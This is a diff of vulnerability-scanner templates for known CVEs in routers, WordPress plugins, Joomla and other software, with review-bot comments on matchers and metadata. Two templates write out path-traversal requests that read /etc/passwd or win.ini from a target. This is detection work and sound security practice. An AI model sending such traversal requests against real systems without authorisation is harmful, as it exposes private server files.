- "{{BaseURL}}/?rest_route=/wp/v2/users/" - "{{BaseURL}}/?rest_route=/wp/v2/users/"
stop-at-first-match: true
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
@ -33,8 +34,9 @@ requests:
- '"name":' - '"name":'
- '"avatar_urls":' - '"avatar_urls":'
condition: and condition: and
extractors: extractors:
- type: regex - type: regex
part: body part: body
regex: regex:
- '"name":"[^"]*"' - '"name":"[^"]*"'

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after “GET /uir” in an HTTP request. description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after “GET /uir” in an HTTP request.
reference: | reference:
- https://www.exploit-db.com/exploits/45678 - https://www.exploit-db.com/exploits/45678
- https://nvd.nist.gov/vuln/detail/CVE-2018-10822 - https://nvd.nist.gov/vuln/detail/CVE-2018-10822
tags: cve,cve2018,lfi,router,dlink tags: cve,cve2018,lfi,router,dlink

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Local file inclusion in Eaton Intelligent Power Manager v1.6 allows an attacker to include a file, it can lead to sensitive information disclosure, denial of service and code execution. description: Local file inclusion in Eaton Intelligent Power Manager v1.6 allows an attacker to include a file, it can lead to sensitive information disclosure, denial of service and code execution.
reference: | reference:
- https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion - https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion
- https://nvd.nist.gov/vuln/detail/CVE-2018-12031 - https://nvd.nist.gov/vuln/detail/CVE-2018-12031
- https://www.exploit-db.com/exploits/48614 - https://www.exploit-db.com/exploits/48614

19
CVE-2018-15473.yaml Normal file
View File

@ -0,0 +1,19 @@
id: CVE-2018-15473
info:
name: OpenSSH Username Enumeration
author: r3dg33k,daffainfo
severity: low
description: OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-15473
tags: network,openssh,cve,cve2018
network:
- host:
- "{{Hostname}}"
- "{{Hostname}}:22"
matchers:
- type: regex
regex:
- 'SSH-2.0-OpenSSH_[1-7].*'
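Review bot: The banner regex in the matcher, 'SSH-2.0-OpenSSH_[1-7].*', is broader than the description's "OpenSSH through 7.7". It also matches 7.8 and 7.9, and any version string whose first digit is 1 to 7, and the dot in SSH-2.0 is unescaped. Suggest bounding the version, for example 'SSH-2\.0-OpenSSH_([1-6]\.[0-9]|7\.[0-7])([^0-9]|$)'. The description should also state that a banner match only shows a version in the affected range and does not confirm the enumeration behaviour, since distributions backport fixes without changing the banner.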

View File

@ -4,9 +4,9 @@ info:
name: WirelessHART Fieldgate SWG70 3.0 - Directory Traversal name: WirelessHART Fieldgate SWG70 3.0 - Directory Traversal
author: daffainfo author: daffainfo
severity: medium severity: medium
reference: | reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-16059 - https://nvd.nist.gov/vuln/detail/CVE-2018-16059
- https://www.exploit-db.com/exploits/45342 - https://www.exploit-db.com/exploits/45342
tags: cve,cve2018,iot,lfi tags: cve,cve2018,iot,lfi
requests: requests:
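Review bot: The info block in this hunk runs from severity straight to reference with no description field, while other templates touched by this commit carry one. Suggest adding a one-line description taken from the NVD entry already listed under reference, so the finding is readable without following the links.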

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: LG SuperSign CMS allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs. description: LG SuperSign CMS allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs.
reference: | reference:
- https://www.exploit-db.com/exploits/45440 - https://www.exploit-db.com/exploits/45440
- https://www.cvedetails.com/cve/CVE-2018-16288 - https://www.cvedetails.com/cve/CVE-2018-16288
tags: cve,cve2018,lfi tags: cve,cve2018,lfi

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: In PHP Proxy 3.0.3, any user can read files from the server without authentication due to an index.php?q=file:/// LFI URI, a different vulnerability than CVE-2018-19246. description: In PHP Proxy 3.0.3, any user can read files from the server without authentication due to an index.php?q=file:/// LFI URI, a different vulnerability than CVE-2018-19246.
reference: | reference:
- https://www.exploit-db.com/exploits/45780 - https://www.exploit-db.com/exploits/45780
- https://www.cvedetails.com/cve/CVE-2018-19458 - https://www.cvedetails.com/cve/CVE-2018-19458
tags: cve,cve2018,lfi tags: cve,cve2018,lfi

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A directory traversal (arbitrary file access) vulnerability exists in the web reports module. This allows an outside attacker to view contents of sensitive files. description: An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A directory traversal (arbitrary file access) vulnerability exists in the web reports module. This allows an outside attacker to view contents of sensitive files.
reference: | reference:
- https://barriersec.com/2019/06/cve-2018-20470-sahi-pro/ - https://barriersec.com/2019/06/cve-2018-20470-sahi-pro/
- https://www.cvedetails.com/cve/CVE-2018-20470 - https://www.cvedetails.com/cve/CVE-2018-20470
tags: cve,cve2018,lfi tags: cve,cve2018,lfi

View File

@ -4,7 +4,7 @@ info:
name: WordPress Plugin WP Payeezy Pay 2.97 - Local File Inclusion name: WordPress Plugin WP Payeezy Pay 2.97 - Local File Inclusion
author: daffainfo author: daffainfo
description: WordPress Plugin WP Payeezy Pay is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin WP Payeezy Pay version 2.97 is vulnerable; prior versions are also affected. description: WordPress Plugin WP Payeezy Pay is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin WP Payeezy Pay version 2.97 is vulnerable; prior versions are also affected.
reference: | reference:
- https://www.pluginvulnerabilities.com/2018/12/06/our-improved-proactive-monitoring-has-now-caught-a-local-file-inclusion-lfi-vulnerability-as-well/ - https://www.pluginvulnerabilities.com/2018/12/06/our-improved-proactive-monitoring-has-now-caught-a-local-file-inclusion-lfi-vulnerability-as-well/
- https://www.cvedetails.com/cve/CVE-2018-20985/ - https://www.cvedetails.com/cve/CVE-2018-20985/
severity: high severity: high

27
CVE-2018-6008.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2018-6008
info:
name: Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Download
author: daffainfo
severity: high
description: Arbitrary File Download exists in the Jtag Members Directory 5.3.7 component for Joomla! via the download_file parameter.
reference:
- https://www.exploit-db.com/exploits/43913
- https://www.cvedetails.com/cve/CVE-2018-6008
tags: cve,cve2018,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
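Review bot: The regex matcher "root:.*:0:0" has no trailing delimiter and no explicit part, so any response containing root: followed later on the same line by :0:0 satisfies it. Suggest "root:.*:0:0:" with part: body to tie the match to the passwd field layout. The name calls this an arbitrary file download while the tags say lfi, so it is worth checking that the tag is the intended one.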

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Path Traversal vulnerability in Controllers/LetsEncryptController.cs in LetsEncryptController in GrandNode 4.40 allows remote, unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests. A patch for this issue was made on 2019-05-30 in GrandNode 4.40. description: Path Traversal vulnerability in Controllers/LetsEncryptController.cs in LetsEncryptController in GrandNode 4.40 allows remote, unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests. A patch for this issue was made on 2019-05-30 in GrandNode 4.40.
reference: | reference:
- https://security401.com/grandnode-path-traversal/ - https://security401.com/grandnode-path-traversal/
- https://www.cvedetails.com/cve/CVE-2019-12276 - https://www.cvedetails.com/cve/CVE-2019-12276
tags: cve,cve2019,lfi tags: cve,cve2019,lfi

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Aptana Jaxer 1.0.3.4547 is vulnerable to a local file inclusion vulnerability in the wikilite source code viewer. This vulnerability allows a remote attacker to read internal files on the server via a tools/sourceViewer/index.html?filename=../ URI. description: Aptana Jaxer 1.0.3.4547 is vulnerable to a local file inclusion vulnerability in the wikilite source code viewer. This vulnerability allows a remote attacker to read internal files on the server via a tools/sourceViewer/index.html?filename=../ URI.
reference: | reference:
- https://www.exploit-db.com/exploits/47214 - https://www.exploit-db.com/exploits/47214
- https://www.cvedetails.com/cve/CVE-2019-14312 - https://www.cvedetails.com/cve/CVE-2019-14312
tags: cve,cve2019,lfi tags: cve,cve2019,lfi

View File

@ -4,7 +4,7 @@ info:
name: WordPress Plugin UserPro 4.9.32 - Reflected Cross-Site Scripting (XSS) name: WordPress Plugin UserPro 4.9.32 - Reflected Cross-Site Scripting (XSS)
author: daffainfo author: daffainfo
severity: medium severity: medium
reference: | reference:
- https://wpscan.com/vulnerability/9815 - https://wpscan.com/vulnerability/9815
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14470 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14470
tags: cve,cve2019,wordpress,xss,wp-plugin tags: cve,cve2019,wordpress,xss,wp-plugin
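Review bot: Missing description between severity and reference in this info block. The commit adds descriptions to the neighbouring WordPress XSS templates, so this one should get the same treatment, naming the affected parameter and the fixed version from the references listed here.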

View File

@ -4,8 +4,8 @@ info:
name: My Calendar <= 3.1.9 - Reflected Cross-Site Scripting (XSS) name: My Calendar <= 3.1.9 - Reflected Cross-Site Scripting (XSS)
author: daffainfo,dhiyaneshDk author: daffainfo,dhiyaneshDk
severity: medium severity: medium
description: Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site. description: The my-calendar plugin before 3.1.10 for WordPress has XSS. Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site.
reference: | reference:
- https://wpscan.com/vulnerability/9267 - https://wpscan.com/vulnerability/9267
- https://nvd.nist.gov/vuln/detail/CVE-2019-15713 - https://nvd.nist.gov/vuln/detail/CVE-2019-15713
tags: cve,cve2019,wordpress,xss,wp-plugin tags: cve,cve2019,wordpress,xss,wp-plugin

View File

@ -4,7 +4,10 @@ info:
name: WordPress Plugin Download Manager 2.9.93 - Reflected Cross-Site Scripting (XSS) name: WordPress Plugin Download Manager 2.9.93 - Reflected Cross-Site Scripting (XSS)
author: daffainfo author: daffainfo
severity: medium severity: medium
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889 description: The download-manager plugin before 2.9.94 for WordPress has XSS via the category shortcode feature, as demonstrated by the orderby or search[publish_date] parameter.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889
- https://www.cybersecurity-help.cz/vdb/SB2019041819
tags: cve,cve2019,wordpress,xss,wp-plugin tags: cve,cve2019,wordpress,xss,wp-plugin
requests: requests:

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: In the api-bearer-auth plugin before 20190907 for WordPress, the server parameter is not correctly filtered in the swagger-config.yaml.php file, and it is possible to inject JavaScript code, aka XSS. description: In the api-bearer-auth plugin before 20190907 for WordPress, the server parameter is not correctly filtered in the swagger-config.yaml.php file, and it is possible to inject JavaScript code, aka XSS.
reference: | reference:
- https://plugins.trac.wordpress.org/changeset/2152730 - https://plugins.trac.wordpress.org/changeset/2152730
- https://wordpress.org/plugins/api-bearer-auth/#developers - https://wordpress.org/plugins/api-bearer-auth/#developers
tags: cve,cve2019,wordpress,xss,wp-plugin tags: cve,cve2019,wordpress,xss,wp-plugin

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: TVT NVMS-1000 devices allow GET /.. Directory Traversal description: TVT NVMS-1000 devices allow GET /.. Directory Traversal
reference: | reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-20085 - https://nvd.nist.gov/vuln/detail/CVE-2019-20085
- https://www.exploit-db.com/exploits/48311 - https://www.exploit-db.com/exploits/48311
tags: cve,cve2019,iot,lfi tags: cve,cve2019,iot,lfi
@ -13,7 +13,7 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/../../../../../../../../../../../Windows/win.ini" - "{{BaseURL}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini"
matchers-condition: and matchers-condition: and
matchers: matchers:
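Review bot: The path line replaces the literal ../ request with a percent-encoded ..%2F one and lowercases Windows, but the description still reads "GET /.. Directory Traversal" and nothing records why the encoding is needed. If the literal form was being normalised away before the request was sent, state that in the commit message. Otherwise keep both paths in the list so a device that does not decode %2F in the path is not silently missed.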

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: The GraceMedia Media Player plugin 1.0 for WordPress allows Local File Inclusion via the cfg parameter. description: The GraceMedia Media Player plugin 1.0 for WordPress allows Local File Inclusion via the cfg parameter.
reference: | reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
- https://seclists.org/fulldisclosure/2019/Mar/26 - https://seclists.org/fulldisclosure/2019/Mar/26
tags: cve,cve2019,wordpress,wp-plugin,lfi tags: cve,cve2019,wordpress,wp-plugin,lfi

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: LimeSurvey before 4.1.12+200324 contains a path traversal vulnerability in application/controllers/admin/LimeSurveyFileManager.php. description: LimeSurvey before 4.1.12+200324 contains a path traversal vulnerability in application/controllers/admin/LimeSurveyFileManager.php.
reference: | reference:
- https://www.exploit-db.com/exploits/48297 - https://www.exploit-db.com/exploits/48297
- https://www.cvedetails.com/cve/CVE-2020-11455 - https://www.cvedetails.com/cve/CVE-2020-11455
tags: cve,cve2020,lfi tags: cve,cve2020,lfi

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: An issue was discovered in Car Rental Management System 1.0. An unauthenticated user can perform a file inclusion attack against the /index.php file with a partial filename in the "page" parameter, to cause local file inclusion resulting in code execution. description: An issue was discovered in Car Rental Management System 1.0. An unauthenticated user can perform a file inclusion attack against the /index.php file with a partial filename in the "page" parameter, to cause local file inclusion resulting in code execution.
reference: | reference:
- https://loopspell.medium.com/cve-2020-29227-unauthenticated-local-file-inclusion-7d3bd2c5c6a5 - https://loopspell.medium.com/cve-2020-29227-unauthenticated-local-file-inclusion-7d3bd2c5c6a5
- https://nvd.nist.gov/vuln/detail/CVE-2020-29227 - https://nvd.nist.gov/vuln/detail/CVE-2020-29227
tags: cve,cve2020,lfi tags: cve,cve2020,lfi

View File

@ -4,7 +4,8 @@ info:
name: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting (XSS) name: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting (XSS)
author: daffainfo author: daffainfo
severity: medium severity: medium
reference: | description: The EventON plugin through 3.0.5 for WordPress allows addons/?q= XSS via the search field.
reference:
- https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS - https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS
- https://nvd.nist.gov/vuln/detail/CVE-2020-29395 - https://nvd.nist.gov/vuln/detail/CVE-2020-29395
tags: cve,cve2020,wordpress,xss,wp-plugin tags: cve,cve2020,wordpress,xss,wp-plugin
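Review bot: The name line spells the product "Wordpress" while the description added in this hunk uses "WordPress". Suggest correcting the name while the block is being edited so searches and reports that group on the name stay consistent.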

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: ACS Advanced Comment System 1.0 is affected by Directory Traversal via an advanced_component_system/index.php?ACS_path=..%2f URI. description: ACS Advanced Comment System 1.0 is affected by Directory Traversal via an advanced_component_system/index.php?ACS_path=..%2f URI.
reference: | reference:
- https://www.exploit-db.com/exploits/49343 - https://www.exploit-db.com/exploits/49343
- https://www.cvedetails.com/cve/CVE-2020-35598 - https://www.cvedetails.com/cve/CVE-2020-35598
tags: cve,cve2020,lfi tags: cve,cve2020,lfi

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: MERCUSYS Mercury X18G 1.0.5 devices allow Directory Traversal via ../ in conjunction with a loginLess or login.htm URI (for authentication bypass) to the web server, as demonstrated by the /loginLess/../../etc/passwd URI. description: MERCUSYS Mercury X18G 1.0.5 devices allow Directory Traversal via ../ in conjunction with a loginLess or login.htm URI (for authentication bypass) to the web server, as demonstrated by the /loginLess/../../etc/passwd URI.
reference: | reference:
- https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md - https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md
- https://nvd.nist.gov/vuln/detail/CVE-2021-23241 - https://nvd.nist.gov/vuln/detail/CVE-2021-23241
tags: cve,cve2021,iot,lfi,router tags: cve,cve2021,iot,lfi,router

View File

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: The Bello - Directory & Listing WordPress theme before 1.6.0 did not properly sanitise and escape its listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value, bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameter in ints listing page, leading to reflected Cross-Site Scripting issues. description: The Bello - Directory & Listing WordPress theme before 1.6.0 did not properly sanitise and escape its listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value, bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameter in ints listing page, leading to reflected Cross-Site Scripting issues.
reference: | reference:
- https://m0ze.ru/vulnerability/%5B2021-03-21%5D-%5BWordPress%5D-%5BCWE-79%5D-Bello-WordPress-Theme-v1.5.9.txt - https://m0ze.ru/vulnerability/%5B2021-03-21%5D-%5BWordPress%5D-%5BCWE-79%5D-Bello-WordPress-Theme-v1.5.9.txt
- https://wpscan.com/vulnerability/6b5b42fd-028a-4405-b027-3266058029bb - https://wpscan.com/vulnerability/6b5b42fd-028a-4405-b027-3266058029bb
tags: cve,cve2021,wordpress,xss,wp-plugin tags: cve,cve2021,wordpress,xss,wp-plugin
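Review bot: The tags line labels this template wp-plugin, but the description says the affected component is a WordPress theme, so tag-based filtering will put it in the wrong group. Suggest a theme tag in place of wp-plugin. The description also has a typo, "in ints listing page", which should read "in its listing page".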

Some files were not shown because too many files have changed in this diff